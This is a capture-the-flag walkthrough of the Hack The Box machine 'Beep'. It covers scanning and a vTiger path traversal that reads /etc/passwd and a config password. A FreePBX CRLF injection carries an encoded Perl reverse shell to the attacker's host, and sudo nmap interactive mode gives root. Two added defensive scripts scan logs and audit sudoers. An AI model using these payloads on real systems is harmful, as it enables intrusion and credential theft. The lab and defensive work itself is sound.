We pick Beep from the list:

Foothold

We can start with our usual nmap scan:

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-24 15:50 EDT
Nmap scan report for 10.10.10.7
Host is up (0.12s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: APOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE EXPIRE(NEVER) STLS TOP PIPELINING USER UIDL RESP-CODES LOGIN-DELAY(0)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            877/udp  status
|_  100024  1            880/tcp  status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed UNSELECT OK IMAP4rev1 UIDPLUS URLAUTHA0001 LISTEXT RENAME X-NETSCAPE LIST-SUBSCRIBED ACL MULTIAPPEND IMAP4 SORT=MODSEQ RIGHTS=kxte IDLE CONDSTORE NAMESPACE CATENATE NO STARTTLS ANNOTATEMORE QUOTA LITERAL+ THREAD=REFERENCES MAILBOX-REFERRALS THREAD=ORDEREDSUBJECT ATOMIC ID CHILDREN SORT BINARY
443/tcp   open  ssl/https?
|_ssl-date: 2019-08-24T20:00:08+00:00; -42s from scanner time.
880/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/24%OT=22%CT=1%CU=42833%PV=Y%DS=2%DC=T%G=Y%TM=5D61982
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=D2%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: mean: -42s, deviation: 0s, median: -42s

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   126.95 ms 10.10.14.1
2   114.02 ms 10.10.10.7

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 827.45 seconds

There’s a lot going on with this one. I am guessing we want to start with some of the mail settings.

Let’s check out the web ports: 80, 443 and 10000.

Open a browser and navigate to the default: http://10.10.10.7/.

We get auto redirected to https:

After accepting the self-signed certificate exception, we are prompted with a login screen:

The login page is for Elastix. If we don’t know what that is, a quick search will tell us it’s a PBX unified communications platform for Linux.

There are also some vulnerabilities:

https://nvd.nist.gov/vuln/search/results?form_type=Basic&results_type=overview&query=elastix&search_type=all

Let’s also search the local Exploit-DB copy with searchsploit:

searchsploit elastix

We know some exist but we aren’t 100% sure which version it is running.

We try gobuster in dir mode: -u sets the URL, -k skips TLS certificate verification (the certificate is self-signed), and -w sets the word list, here the common.txt list that ships with dirb.

gobuster dir -k -u https://10.10.10.7/ -w /usr/share/wordlists/dirb/common.txt

Output

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.7/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/09/24 21:07:24 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/cgi-bin/ (Status: 403)
/configs (Status: 301)
/favicon.ico (Status: 200)
/help (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/lang (Status: 301)
/libs (Status: 301)
/mail (Status: 301)
/modules (Status: 301)
/panel (Status: 301)
/robots.txt (Status: 200)
/static (Status: 301)
/themes (Status: 301)
/var (Status: 301)
===============================================================
2019/09/24 21:15:23 Finished
===============================================================

Let’s check out https://10.10.10.7/robots.txt:

User-agent: *
Disallow: /

From the 301 codes I am going to take a guess that the permanent redirect refers to http to https. So let’s check them out from the top:

The /admin requires a login:

A failed attempt gives us an unauthorized error but another hint – the version of FreePBX:

The FreePBX default credentials are admin:admin however, those did not work.

We can see configs/:

We also see /mail:

Looks like it’s Roundcube, an IMAP web mail client.

After looking around we go back to the Elastix part. The file timestamps seem to indicate creation on November 01, 2011.

From this link it looks like it could be version 2.2:   https://distrowatch.com/index.php?distribution=elastix

This means one of the searchsploit results may match this version:

searchsploit -x 37637

It’s a Perl script that performs a local path traversal against the Elastix web interface.

This is the part we care about:

Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

From the code, we first check that the vulnerable component, vTiger CRM, is reachable on the target:

And it does exist, so this exploit may work.

User

Before running the full exploit, I want to try getting the user flag using just the path traversal itself:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action

We get a user: fanis. Let’s go right for the flag:

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//home/fanis/user.txt%00&module=Accounts&action

Now back to the exploit’s original target, /etc/amportal.conf:

Alright, we get some passwords so let’s try admin:jEhdIekWmdjE:

Great.

From there we take a look around. Finally, I see the user, fanis, has an extension created:

With an extension number in hand, we can use another exploit from our earlier searchsploit results, one that requires a valid extension:

searchsploit -x 18650

This is the main part we care about:

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

You can either fill in rhost, extension, lhost and lport and request the resulting URL directly, or edit those values in the script and run it.

We set up our reverse listener locally:

nc -lvp 443

Then run the payload.
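As an added example that is not part of this writeup or of either exploit, here is a check a defender could run over Apache access logs to spot the two request shapes used above: the graph.php path traversal terminated with %00, and the callme_page.php request carrying %0D%0A line breaks in callmenum. The log lines are constructed, and the extension number 233 in them is a placeholder, not a value from the box.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines for illustration (not real traffic):
# a benign page view, a graph.php request with traversal plus a null byte,
# a callme_page.php request with CRLF line breaks in callmenum (233 is a
# placeholder extension), and an ordinary FreePBX admin request.
SAMPLE_LOG = """\
10.10.14.5 - - [24/Aug/2019:15:55:01 -0400] "GET /index.php HTTP/1.1" 200 5121
10.10.14.5 - - [24/Aug/2019:15:56:10 -0400] "GET /vtigercrm/graph.php?current_language=../../../../../../../..//etc/passwd%00&module=Accounts&action HTTP/1.1" 200 2103
10.10.14.5 - - [24/Aug/2019:15:58:42 -0400] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20true%0D%0A%0D%0A HTTP/1.1" 200 11
10.10.14.9 - - [24/Aug/2019:16:01:03 -0400] "GET /admin/config.php?display=extensions HTTP/1.1" 302 -
"""

# Client IP, timestamp, request line and status from a combined-format entry.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads (%252e%252e%252f) are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def indicators_for(value):
    """Return the set of injection indicators present in one decoded parameter value."""
    found = set()
    if re.search(r'\.\.[\\/]', value):   # ../ or ..\ directory traversal
        found.add('traversal')
    if '\x00' in value:                   # %00 terminator used to cut off a suffix
        found.add('null_byte')
    if '\r' in value or '\n' in value:    # injected line breaks (%0D%0A)
        found.add('crlf')
    return found


def scan_log(text):
    """Return one finding per request whose query parameters carry any indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group('target'))
        hits = {}
        # parse_qsl decodes once; fully_decode catches double encoding on top of that
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            ind = indicators_for(fully_decode(raw))
            if ind:
                hits.setdefault(name, set()).update(ind)
        if hits:
            findings.append({
                'ip': m.group('ip'),
                'time': m.group('ts'),
                'path': parts.path,
                'status': int(m.group('status')),
                'indicators': {k: sorted(v) for k, v in hits.items()},
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['status']} -> {f['indicators']}")
```

The status and response size columns are what separate an attempt from a successful read: a 200 with a non-trivial body on graph.php after a traversal request is the one to escalate. The check decodes each parameter repeatedly because a single decode misses double-encoded traversal sequences.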

Privilege Escalation

The escalation chains off the shell we already have: the asterisk user is allowed to run nmap with sudo. Because nmap’s interactive mode can spawn a shell, we can run it as root and then drop into a shell that keeps those elevated privileges.

Run nmap in interactive mode:

sudo nmap --interactive

Inside the interactive prompt, spawning a shell gives us one running as root:

!sh

We then can get the root flag:

cat /root/root.txt
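As an added example that is not part of the writeup, the following script audits a sudoers file for the condition this escalation depends on: a non-root user granted sudo on a program that can spawn a shell. The sudoers excerpt is constructed; the asterisk rule for /usr/bin/nmap mirrors the one this box relies on (the binary path is an assumption), and the other rules as well as the SHELL_CAPABLE names beyond nmap are assumptions.

```python
import os
import re
from collections import namedtuple

# Constructed sudoers excerpt for illustration. The asterisk rule mirrors the
# one this box relies on (the /usr/bin/nmap path is an assumption); the other
# rules are made up.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed)
Defaults    requiretty
root        ALL=(ALL)       ALL
asterisk    ALL = (root) NOPASSWD: /usr/bin/nmap, /sbin/iptables, /usr/sbin/asterisk
backup      ALL=(root) NOPASSWD: /usr/bin/rsync
www-data    ALL=(root) /usr/bin/systemctl restart httpd
"""

# Programs whose own features (an interactive mode, an editor escape, a
# script or exec option) hand the caller a shell as the sudo target user.
# nmap is the case on this page; the remaining names are assumptions.
SHELL_CAPABLE = {'nmap', 'vi', 'vim', 'less', 'more', 'find', 'awk', 'perl', 'python', 'rsync'}

Rule = namedtuple('Rule', 'user host runas command nopasswd')

# user  host = (runas) [TAG:] cmd, cmd, ...  (aliases and line continuations are not handled)
RULE_RE = re.compile(r'^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$')
TAG_RE = re.compile(r'^((?:NO)?PASSWD|(?:NO)?SETENV|(?:NO)?EXEC|(?:NO)?LOG_INPUT|(?:NO)?LOG_OUTPUT):\s*')


def parse_sudoers(text):
    """Expand each user specification into one Rule per command."""
    rules = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # (user:group) -> user; no parenthesised target means root
        runas = (m.group('runas') or 'root').split(':')[0].strip() or 'root'
        nopasswd = False
        for entry in m.group('cmds').split(','):
            entry = entry.strip()
            # A tag applies to every command that follows it in the list
            while (t := TAG_RE.match(entry)):
                if t.group(1) == 'NOPASSWD':
                    nopasswd = True
                elif t.group(1) == 'PASSWD':
                    nopasswd = False
                entry = entry[t.end():].lstrip()
            rules.append(Rule(m.group('user'), m.group('host'), runas, entry, nopasswd))
    return rules


def audit(rules):
    """Return (user, command, reason) for rules that amount to a shell as the runas user."""
    findings = []
    for r in rules:
        if r.user == 'root':
            continue
        if r.command == 'ALL':
            findings.append((r.user, r.command, f'unrestricted sudo as {r.runas}'))
            continue
        prog = os.path.basename(r.command.split()[0])
        if prog in SHELL_CAPABLE:
            how = 'without a password' if r.nopasswd else 'with their own password'
            findings.append((r.user, r.command, f'{prog} can spawn a shell as {r.runas} {how}'))
    return findings


if __name__ == '__main__':
    for user, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f'{user}: {cmd} -> {reason}')
```

The fix on a real system is the same one the audit points at: remove the shell-capable binary from the service account's sudo rule, or restrict it to a wrapper that only runs the fixed arguments the service actually needs.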